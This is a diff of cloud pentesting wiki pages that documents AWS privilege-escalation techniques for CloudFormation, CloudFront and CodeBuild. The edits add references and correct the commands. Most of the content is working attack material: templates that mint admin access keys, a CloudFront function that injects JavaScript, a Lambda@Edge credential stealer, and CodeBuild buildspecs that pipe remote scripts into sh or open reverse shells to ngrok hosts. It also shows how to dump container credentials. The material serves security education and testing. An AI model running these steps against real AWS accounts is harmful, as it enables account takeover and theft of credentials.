-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
-- [https://github.com/aws/aws-cdk-cli/blob/main/packages/aws-cdk/lib/api/bootstrap/bootstrap-template.yaml](https://github.com/aws/aws-cdk-cli/blob/main/packages/aws-cdk/lib/api/bootstrap/bootstrap-template.yaml)
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [2] [AWS CDK bootstrap template](https://github.com/aws/aws-cdk-cli/blob/main/packages/aws-cdk/lib/api/bootstrap/bootstrap-template.yaml)
+- [3] [CloudFormation service role](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-iam-servicerole.html)
+- [4] [CreateStack API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_CreateStack.html)
+- [5] [UpdateStack API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_UpdateStack.html)
+- [6] [Prevent updates to stack resources](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/protect-stack-resources.html)
+- [7] [Control CloudFormation access with IAM](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/control-access-with-iam.html)
+- [8] [CreateChangeSet API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_CreateChangeSet.html)
+- [9] [ExecuteChangeSet API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_ExecuteChangeSet.html)
+- [10] [CreateStackSet API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_CreateStackSet.html)
+- [11] [UpdateStackSet API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_UpdateStackSet.html)
+- [12] [CreateStackInstances API reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_CreateStackInstances.html)
+- [13] [Grant self-managed permissions for CloudFormation StackSets](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/stacksets-prereqs-self-managed.html)
+- [14] [What is the AWS CDK?](https://docs.aws.amazon.com/cdk/v2/guide/home.html)
+- [15] [Bootstrap your environment for use with the AWS CDK](https://docs.aws.amazon.com/cdk/v2/guide/bootstrapping-env.html)
+- [16] [Deploy AWS CDK applications](https://docs.aws.amazon.com/cdk/v2/guide/deploy.html)
+- [17] [AWS CDK security best practices](https://docs.aws.amazon.com/cdk/v2/guide/best-practices-security.html)
+- [18] [AWS CDK ArtifactManifest API reference](https://docs.aws.amazon.com/cdk/api/v2/docs/%40aws-cdk_cloud-assembly-schema.ArtifactManifest.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
@@ -1,8 +1,6 @@
-# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks
+# iam:PassRole, cloudformation:CreateStack, and cloudformation:DescribeStacks
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like:
+An attacker could for example use a **CloudFormation template** that generates **keys for an admin** user like:<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
 ```json
 {
@@ -57,28 +55,32 @@ An attacker could for example use a **cloudformation template** that generates *
 }
 ```
 
-Then **generate the cloudformation stack**:
+For an `AWS::IAM::AccessKey` resource, `Ref` resolves to the access-key ID and `Fn::GetAtt` can return its `SecretAccessKey`; the template exposes both values through `Outputs`.<sup>[[4]](#references)[[5]](#references)</sup>
+
+Then **generate the CloudFormation stack** with the role ARN that CloudFormation will assume. The AWS CLI option is `--role-arn`, and stack creation starts asynchronously after the call succeeds.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws cloudformation create-stack --stack-name privesc \
     --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
-    --role arn:aws:iam::[REDACTED]:role/adminaccess \
+    --role-arn arn:aws:iam::[REDACTED]:role/adminaccess \
     --capabilities CAPABILITY_IAM --region us-west-2
 ```
 
-**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**:
+**Wait until the stack reaches `CREATE_COMPLETE`** and then **get the outputs** where the **credentials are stored**. For a running stack, `DescribeStacks` accepts either its name or unique ID and returns the stack structure containing its outputs.<sup>[[1]](#references)[[2]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 aws cloudformation describe-stacks \
-    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
-    --region uswest-2
+    --stack-name privesc \
+    --region us-west-2
 ```
 
-### References
+## References
 
-- [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws)
+- [1] [Investigating Privilege Escalation Methods in AWS](https://bishopfox.com/blog/privilege-escalation-in-aws)
+- [2] [create-stack — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudformation/create-stack.html)
+- [3] [CreateStack - AWS CloudFormation](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_CreateStack.html)
+- [4] [AWS::IAM::AccessKey - AWS CloudFormation](https://docs.aws.amazon.com/AWSCloudFormation/latest/TemplateReference/aws-resource-iam-accesskey.html)
+- [5] [AWS Identity and Access Management template snippets - AWS CloudFormation](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/quickref-iam.html)
+- [6] [DescribeStacks - AWS CloudFormation](https://docs.aws.amazon.com/AWSCloudFormation/latest/APIReference/API_DescribeStacks.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudfront-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudfront-privesc/README.md
@@ -1,20 +1,18 @@
 # AWS - CloudFront Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## CloudFront
 
 ### `cloudfront:UpdateDistribution` & `cloudfront:GetDistributionConfig`
 
-An attacker who has cloudfront:UpdateDistribution and cloudfront:GetDistributionConfig permissions can modify a CloudFront distribution’s configuration. They don’t need permissions on the target S3 bucket itself, although the attack is easier if that bucket has a permissive policy that allows access from the cloudfront.amazonaws.com service principal.
+An attacker who has cloudfront:UpdateDistribution and cloudfront:GetDistributionConfig permissions can modify a CloudFront distribution’s configuration. They don’t need direct IAM permissions on the target S3 bucket when that bucket is public or its bucket policy already allows the distribution’s CloudFront service principal to read it; otherwise, changing the origin does not make a private bucket readable.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-The attacker changes a distribution’s origin configuration to point to another S3 bucket or to a server controlled by the attacker. First they fetch the current distribution configuration:
+The attacker changes a distribution’s origin configuration to point to another S3 bucket or to a server controlled by the attacker. First they fetch the current distribution configuration:<sup>[[1]](#references)</sup>
 
 ```bash
 aws cloudfront get-distribution-config --id <distribution-id> | jq '.DistributionConfig' > current-config.json
 ```
 
-Then they edit current-config.json to point the origin to the new resource — for example, a different S3 bucket:
+Then they edit current-config.json to point the origin to the new resource — for example, a different S3 bucket. For an S3 origin, retain a compatible origin access control or origin access identity and the corresponding bucket policy; a custom server requires the corresponding custom-origin configuration.<sup>[[3]](#references)</sup>
 
 ```bash
 ...
@@ -23,7 +21,7 @@ Then they edit current-config.json to point the origin to the new resource — f
   "Items": [
     {
       "Id": "<origin-id>",
-      "DomainName": "<new-bucket>.s3.us-east-1.amazonaws.com",
+      "DomainName": "<new-bucket>.s3.<bucket-region>.amazonaws.com",
       "OriginPath": "",
       "CustomHeaders": {
         "Quantity": 0
@@ -37,14 +35,14 @@ Then they edit current-config.json to point the origin to the new resource — f
       "OriginShield": {
         "Enabled": false
       },
-      "OriginAccessControlId": "E30N32Y4IBZ971"
+      "OriginAccessControlId": "<existing-origin-access-control-id>"
     }
   ]
 },
 ...
 ```
 
-Finally, apply the modified configuration (you must supply the current ETag when updating):
+Finally, apply the modified configuration (you must supply the current ETag when updating):<sup>[[2]](#references)</sup>
 
 ```bash
 CURRENT_ETAG=$(aws cloudfront get-distribution-config --id <distribution-id> --query 'ETag' --output text)
@@ -55,12 +53,13 @@ aws cloudfront update-distribution \
   --if-match $CURRENT_ETAG
   ```
 
-### `cloudfront:UpdateFunction`, `cloudfront:PublishFunction`, `cloudfront:GetFunction`, `cloudfront:CreateFunction` and `cloudfront:AssociateFunction`
-An attacker needs the permissions cloudfront:UpdateFunction, cloudfront:PublishFunction, cloudfront:GetFunction, cloudfront:CreateFunction and cloudfront:AssociateFunction to manipulate or create CloudFront functions.
+### `cloudfront:CreateFunction`, `cloudfront:DescribeFunction`, `cloudfront:PublishFunction`, `cloudfront:GetDistributionConfig` & `cloudfront:UpdateDistribution`
 
-The attacker creates a malicious CloudFront Function that injects JavaScript into HTML responses:
+An attacker needs permission to create or update a CloudFront Function, publish it, and update the target distribution. The CLI sequence below uses cloudfront:CreateFunction, cloudfront:DescribeFunction, cloudfront:PublishFunction, cloudfront:GetDistributionConfig, and cloudfront:UpdateDistribution; modifying an existing function also uses cloudfront:GetFunction and cloudfront:UpdateFunction. CloudFront has no separate cloudfront:AssociateFunction IAM action—the association is part of the distribution update.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
-```bash
+The attacker creates a malicious CloudFront Function that injects JavaScript into HTML responses. A viewer-response function can replace the response body and adjust response headers, but it cannot inspect the original body.<sup>[[4]](#references)</sup>
+
+```javascript
 function handler(event) {
   var request = event.request;
   var response = event.response;
@@ -93,7 +92,7 @@ function handler(event) {
 }
 ```
 
-Commands to create, publish and attach the function:
+Commands to create, publish and attach the function:<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # Create the malicious function in CloudFront
@@ -109,7 +108,7 @@ aws cloudfront describe-function --name malicious-function --stage DEVELOPMENT -
 aws cloudfront publish-function --name malicious-function --if-match <etag>
 ```
 
-Add the function to the distribution configuration (FunctionAssociations):
+Add the published function to the target cache behavior’s distribution configuration (FunctionAssociations). Only functions in the LIVE stage can be associated.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 "FunctionAssociations": {
@@ -123,7 +122,7 @@ Add the function to the distribution configuration (FunctionAssociations):
 }
 ```
 
-Finally update the distribution configuration (remember to supply the current ETag):
+Finally update the distribution configuration (remember to supply the current ETag):<sup>[[2]](#references)[[7]](#references)</sup>
 
 ```bash
 CURRENT_ETAG=$(aws cloudfront get-distribution-config --id <distribution-id> --query 'ETag' --output text)
@@ -131,13 +130,13 @@ CURRENT_ETAG=$(aws cloudfront get-distribution-config --id <distribution-id> --q
 aws cloudfront update-distribution --id <distribution-id> --distribution-config file://current-config.json --if-match $CURRENT_ETAG
 ```
 
-### `lambda:CreateFunction`, `lambda:UpdateFunctionCode`, `lambda:PublishVersion`, `iam:PassRole` & `cloudfront:UpdateDistribution`
+### `lambda:CreateFunction`, `lambda:PublishVersion`, `iam:PassRole` & `cloudfront:UpdateDistribution`
 
-An attacker needs the lambda:CreateFunction, lambda:UpdateFunctionCode, lambda:PublishVersion, iam:PassRole and cloudfront:UpdateDistribution permissions to create and associate malicious Lambda@Edge functions. A role that can be assumed by the lambda.amazonaws.com and edgelambda.amazonaws.com service principals is also required.
+An attacker needs lambda:CreateFunction, lambda:PublishVersion, iam:PassRole, and cloudfront:UpdateDistribution to create and associate a malicious Lambda@Edge function; lambda:UpdateFunctionCode is additionally needed when reusing an existing function. Associating a Lambda@Edge version also requires lambda:GetFunction, lambda:EnableReplication*, and lambda:DisableReplication*, plus iam:CreateServiceLinkedRole the first time Lambda@Edge is configured. The execution role must trust both the lambda.amazonaws.com and edgelambda.amazonaws.com service principals.<sup>[[9]](#references)[[15]](#references)</sup>
 
-The attacker creates a malicious Lambda@Edge function that steals the IAM role credentials:
+The attacker creates a malicious Lambda@Edge function that steals the IAM role credentials. Lambda makes temporary execution-role credentials available through reserved environment variables, and Lambda@Edge functions can make network calls to external resources.<sup>[[10]](#references)[[11]](#references)[[13]](#references)</sup>
 
-```bash
+```javascript
 // malicious-lambda-edge.js
 exports.handler = async (event) => {
   // Obtain role credentials
@@ -181,17 +180,19 @@ zip malicious-lambda-edge.zip malicious-lambda-edge.js
 # Create the Lambda@Edge function with a privileged role
 aws lambda create-function \
     --function-name malicious-lambda-edge \
-    --runtime nodejs18.x \
+    --runtime nodejs22.x \
     --role <privileged-role-arn> \
     --handler malicious-lambda-edge.handler \
     --zip-file fileb://malicious-lambda-edge.zip \
-    --region <region>
+    --region us-east-1
 
 # Publish a version of the function
-aws lambda publish-version --function-name malicious-lambda-edge --region <region>
+aws lambda publish-version --function-name malicious-lambda-edge --region us-east-1
 ```
 
-Then the attacker updates the CloudFront distribution configuration to reference the published Lambda@Edge version:
+Create and publish the function in US East (N. Virginia), use a numbered version (not $LATEST or an alias), and choose a runtime currently supported by Lambda@Edge.<sup>[[10]](#references)[[12]](#references)[[13]](#references)</sup>
+
+Then the attacker updates the CloudFront distribution configuration to reference the published Lambda@Edge version. The association uses the versioned us-east-1 ARN and a viewer-response trigger.<sup>[[9]](#references)[[10]](#references)[[14]](#references)</sup>
 
 ```bash
 "LambdaFunctionAssociations": {
@@ -206,6 +207,8 @@ Then the attacker updates the CloudFront distribution configuration to reference
 }
 ```
 
+After applying the update, wait until the distribution is deployed before testing the edge function.<sup>[[16]](#references)</sup>
+
 ```bash
 # Apply the updated distribution config (must use current ETag)
 CURRENT_ETAG=$(aws cloudfront get-distribution-config --id <distribution-id> --query 'ETag' --output text)
@@ -215,11 +218,30 @@ aws cloudfront update-distribution \
   --distribution-config file://current-config.json \
   --if-match $CURRENT_ETAG
 
+# Wait for the distribution to deploy before triggering the function
+aws cloudfront wait distribution-deployed --id <distribution-id>
+
 # Trigger the function by requesting the distribution
 curl -v https://<distribution-domain>.cloudfront.net/
 ```
 
+## References
+
+- [1] [GetDistributionConfig - Amazon CloudFront](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_GetDistributionConfig.html)
+- [2] [UpdateDistribution - Amazon CloudFront](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_UpdateDistribution.html)
+- [3] [Restrict access to an Amazon S3 origin - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/private-content-restricting-access-to-s3.html)
+- [4] [CloudFront Functions event structure - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/functions-event-structure.html)
+- [5] [Create functions - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/create-function.html)
+- [6] [Publish functions - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/publish-function.html)
+- [7] [Associate functions with distributions - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/associate-function.html)
+- [8] [Actions, resources, and condition keys for Amazon CloudFront](https://docs.aws.amazon.com/service-authorization/latest/reference/list_cloudfront.html)
+- [9] [Set up IAM permissions and roles for Lambda@Edge - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/lambda-edge-permissions.html)
+- [10] [Restrictions on Lambda@Edge - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/lambda-at-edge-function-restrictions.html)
+- [11] [Using source function ARN to control function access behavior - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/permissions-source-function-arn.html)
+- [12] [Lambda runtimes - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html)
+- [13] [Ways to use Lambda@Edge - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/lambda-edge-ways-to-use.html)
+- [14] [Lambda@Edge event structure - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/lambda-event-structure.html)
+- [15] [Actions, resources, and condition keys for AWS Lambda](https://docs.aws.amazon.com/service-authorization/latest/reference/list_lambda.html)
+- [16] [distribution-deployed - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudfront/wait/distribution-deployed.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Codebuild Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## codebuild
 
 Get more info in:
@@ -12,7 +10,7 @@ Get more info in:
 
 ### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
 
-Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:<sup>[[1]](#references)[[2]](#references)[[8]](#references)[[9]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="StartBuild" }}
@@ -27,7 +25,7 @@ phases:
             - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
 EOF
 
-aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+aws codebuild start-build --project-name <project-name> --buildspec-override "$(cat /tmp/buildspec.yml)"
 ```
 
 {{#endtab }}
@@ -56,7 +54,7 @@ batch:
       ignore-failure: true
 EOF
 
-aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+aws codebuild start-build-batch --project-name <project-name> --buildspec-override "$(cat /tmp/buildspec.yml)"
 ```
 
 {{#endtab }}
@@ -64,23 +62,23 @@ aws codebuild start-build-batch --project <project-name> --buildspec-override fi
 
 **Note**: The difference between these two commands is that:
 
-- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
-- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+- `StartBuild` triggers a single build job using a specific `buildspec.yml`.<sup>[[1]](#references)</sup>
+- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).<sup>[[2]](#references)[[4]](#references)</sup>
 
 **Potential Impact:** Direct privesc to attached AWS Codebuild roles.
 
 #### StartBuild Env Var Override
 
-Even if you **can't modify the project** (`UpdateProject`) and you **can't override the buildspec**, `codebuild:StartBuild` still allows overriding env vars at build time via:
+Even if you **can't modify the project** (`UpdateProject`) and you **can't override the buildspec**, `codebuild:StartBuild` still allows overriding env vars at build time through the following interfaces:<sup>[[1]](#references)[[3]](#references)</sup>
 
-- CLI: `--environment-variables-override`
-- API: `environmentVariablesOverride`
+- CLI: `--environment-variables-override`.<sup>[[3]](#references)</sup>
+- API: `environmentVariablesOverride`.<sup>[[1]](#references)</sup>
 
-If the build uses environment variables to control behavior (destination buckets, feature flags, proxy settings, logging, etc.), this can be enough to **exfiltrate secrets** the build role can access or to get **code execution** inside the build.
+If the build uses environment variables to control behavior (destination buckets, feature flags, proxy settings, logging, etc.), this can be enough to **exfiltrate secrets** the build role can access or to get **code execution** inside the build.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ##### Example 1: Redirect Artifact/Upload Destination to Exfiltrate Secrets
 
-If the build publishes an artifact to a bucket/path controlled by an env var (for example `UPLOAD_BUCKET`), override it to an attacker-controlled bucket:
+If the build publishes an artifact to a bucket/path controlled by an env var (for example `UPLOAD_BUCKET`), override it to an attacker-controlled bucket:<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 export PROJECT="<project-name>"
@@ -107,11 +105,11 @@ aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -
 
 If the build runs `python3` (common in buildspecs), you can sometimes get code execution without touching the buildspec by abusing:
 
-- `PYTHONWARNINGS`: Python resolves the *category* field and will import dotted paths. Setting it to `...:antigravity.x:...` forces importing the stdlib module `antigravity`.
-- `antigravity`: calls `webbrowser.open(...)`.
-- `BROWSER`: controls what `webbrowser` executes. On Linux it is `:`-separated. Using `#%s` makes the URL argument a shell comment.
+- `PYTHONWARNINGS`: Python resolves the *category* field and will import dotted paths. Setting it to `...:antigravity.x:...` forces importing the stdlib module `antigravity`.<sup>[[13]](#references)[[14]](#references)</sup>
+- `antigravity`: calls `webbrowser.open(...)`.<sup>[[14]](#references)</sup>
+- `BROWSER`: controls what `webbrowser` executes. On Linux it is `:`-separated. Using `#%s` makes the URL argument a shell comment.<sup>[[15]](#references)</sup>
 
-This can be used to print the CodeBuild role credentials (from `http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`) into CloudWatch logs, then recover them if you have log read permissions.
+This can be used to print the CodeBuild role credentials (from `http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`) into CloudWatch logs, then recover them if you have log read permissions.<sup>[[9]](#references)[[10]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[18]](#references)</sup>
 
 <details>
 <summary>Expandable: StartBuild JSON request for the <code>PYTHONWARNINGS</code> + <code>BROWSER</code> trick</summary>
@@ -138,7 +136,7 @@ This can be used to print the CodeBuild role credentials (from `http://169.254.1
 
 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.<sup>[[1]](#references)[[2]](#references)[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Example1" }}
@@ -189,6 +187,8 @@ aws codebuild delete-project --name codebuild-demo-project
 
 {{#tab name="Example2" }}
 
+The S3 source must be a ZIP archive with `buildspec.yml` at its root.<sup>[[4]](#references)[[16]](#references)</sup>
+
 ```bash
 # Generated by AI, not tested
 # Create a buildspec.yml file with reverse shell command
@@ -198,11 +198,14 @@ phases:
     commands:
       - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
 
-# Upload the buildspec to the bucket and give access to everyone
-aws s3 cp buildspec.yml s3:<S3_BUCKET_NAME>/buildspec.yml
+# Package the buildspec at the root of the S3 source archive
+zip -j source.zip buildspec.yml
 
-# Create a new CodeBuild project with the buildspec.yml file
-aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60
+# Upload the source archive to the bucket
+aws s3 cp source.zip s3://<S3_BUCKET_NAME>/source.zip
+
+# Create a new CodeBuild project with the source archive
+aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/source.zip --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60
 
 # Start a build with the new project
 aws codebuild start-build --project-name reverse-shell-project
@@ -235,7 +238,7 @@ aws codebuild start-build --project-name reverse-shell-project
 }
 
 # Create a new CodeBuild project with the hook.json file
-aws codebuild create-project --cli-input-json file:///tmp/hook.json  
+aws codebuild create-project --cli-input-json file:///tmp/hook.json
 
 # Start a build with the new project
 aws codebuild start-build --project-name user-project-1
@@ -251,17 +254,17 @@ Wait a few seconds to maybe a couple minutes and view the POST request with data
 **Potential Impact:** Direct privesc to any AWS Codebuild role.
 
 > [!WARNING]
-> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**.
+> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**.<sup>[[9]](#references)[[10]](#references)[[18]](#references)[[19]](#references)</sup>
 
-> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
+> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`.<sup>[[9]](#references)[[10]](#references)[[18]](#references)</sup>
 
-> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials.
+> Append that path to **`http://169.254.170.2`** (without an extra slash) and you will be able to dump the role credentials.<sup>[[9]](#references)[[10]](#references)[[18]](#references)</sup>
 
-> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**.
+> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**.<sup>[[11]](#references)[[18]](#references)</sup>
 
 ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token
+Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token.<sup>[[1]](#references)[[2]](#references)[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 REV_PATH="/tmp/codebuild_pwn.json"
@@ -301,7 +304,7 @@ aws codebuild start-build --project-name codebuild-demo-project
 
 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
-Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
+Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.<sup>[[1]](#references)[[2]](#references)[[6]](#references)[[8]](#references)[[9]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="StartBuild" }}
@@ -385,7 +388,7 @@ aws codebuild start-build-batch --project-name codebuild-demo-project
 
 ### SSM
 
-Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built.
+Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built.<sup>[[12]](#references)</sup>
 
 The codebuild project will need to have a breakpoint:
 
@@ -397,6 +400,8 @@ The codebuild project will need to have a breakpoint:
 <strong>      - codebuild-breakpoint
 </strong></code></pre>
 
+Start the build with session connections enabled; otherwise the `codebuild-breakpoint` and `codebuild-resume` commands are ignored.<sup>[[12]](#references)</sup>
+
 And then:
 
 ```bash
@@ -404,11 +409,11 @@ aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
 aws ssm start-session --target <sessionTarget> --region <region>
 ```
 
-For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
+For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).<sup>[[12]](#references)</sup>
 
 ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`
 
-An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process.
+An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process.<sup>[[3]](#references)[[4]](#references)[[17]](#references)</sup>
 
 Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker.
 
@@ -417,7 +422,7 @@ aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
 
 vim ./buildspec.yml
 
-# Add the following lines in the "phases > pre_builds > commands" section
+# Add the following lines in the "phases > pre_build > commands" section
 #
 #    - apt-get install nmap -y
 #    - ncat <IP> <PORT> -e /bin/sh
@@ -440,15 +445,35 @@ phases:
       - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
 ```
 
-**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.
+**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.<sup>[[8]](#references)[[17]](#references)</sup>
 
 > [!WARNING]
-> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload
+> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload.<sup>[[4]](#references)[[16]](#references)</sup>
 
-More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
+More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation).<sup>[[4]](#references)[[17]](#references)</sup>
 
 **Potential Impact:** Direct privesc to attached AWS Codebuild roles.
 
+## References
+
+- [1] [StartBuild - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_StartBuild.html)
+- [2] [StartBuildBatch - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_StartBuildBatch.html)
+- [3] [Run a build (AWS CLI) - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/run-build-cli.html)
